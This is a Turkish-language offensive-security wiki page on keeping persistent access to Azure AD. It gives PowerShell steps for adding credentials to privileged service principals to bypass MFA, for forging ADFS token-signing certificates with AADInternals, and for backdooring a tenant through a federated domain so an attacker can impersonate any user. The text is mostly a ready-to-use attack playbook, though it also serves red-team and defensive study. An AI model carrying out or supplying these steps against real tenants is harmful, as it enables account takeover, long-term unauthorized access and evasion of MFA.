Az - Persistence

İzin Verilmeyen Onay Verme

Varsayılan olarak, herhangi bir kullanıcı Azure AD'de bir uygulama kaydedebilir. Bu nedenle, yüksek etki izinlerine ihtiyaç duyan (ve eğer admin iseniz onaylayabileceğiniz) bir uygulama kaydedebilirsiniz - örneğin, bir kullanıcının adına e-posta göndermek, rol yönetimi vb. Bu, başarılı olursa oltalama saldırıları gerçekleştirmemize olanak tanıyacaktır.

Ayrıca, bu uygulamayı kullanıcı olarak kabul ederek ona erişimi sürdürme yolunu da seçebilirsiniz.

Uygulamalar ve Hizmet Prensipleri

Uygulama Yöneticisi, GA veya microsoft.directory/applications/credentials/update izinlerine sahip özel bir rol ile, mevcut bir uygulamaya kimlik bilgileri (gizli anahtar veya sertifika) ekleyebiliriz.

Yüksek izinlere sahip bir uygulamayı hedeflemek veya yüksek izinlere sahip yeni bir uygulama eklemek mümkündür.

Uygulamaya eklemek için ilginç bir rol, Ayrıcalıklı kimlik doğrulama yöneticisi rolü olacaktır çünkü bu, Küresel Yöneticilerin şifresini sıfırlama yetkisi verir.

Bu teknik ayrıca MFA'yı atlatma olanağı da sağlar.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• Sertifika tabanlı kimlik doğrulama için

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federation - Token Signing Certificate

On-prem AD üzerinde DA ayrıcalıkları ile, çok uzun geçerlilik süresine sahip yeni Token signing ve Token Decrypt sertifikaları oluşturmak ve içe aktarmak mümkündür. Bu, bildiğimiz herhangi bir kullanıcının ImuutableID'si ile giriş yapmamıza olanak tanıyacaktır.

Aşağıdaki komutu ADFS sunucularında DA olarak çalıştırarak yeni sertifikalar oluşturun (varsayılan şifre 'AADInternals'), bunları ADFS'ye ekleyin, otomatik yenilemeyi devre dışı bırakın ve hizmeti yeniden başlatın:

New-AADIntADFSSelfSignedCertificates

Sonra, sertifika bilgilerini Azure AD ile güncelleyin:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federation - Güvenilir Alan

GA ayrıcalıkları ile bir kiracıda, yeni bir alan eklemek mümkündür (doğrulanması gerekir), kimlik doğrulama türünü Federated olarak yapılandırmak ve alanı belirli bir sertifikaya (aşağıdaki komutta any.sts) ve vericiye güvenecek şekilde yapılandırmak mümkündür:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Referanslar

• https://aadinternalsbackdoor.azurewebsites.net/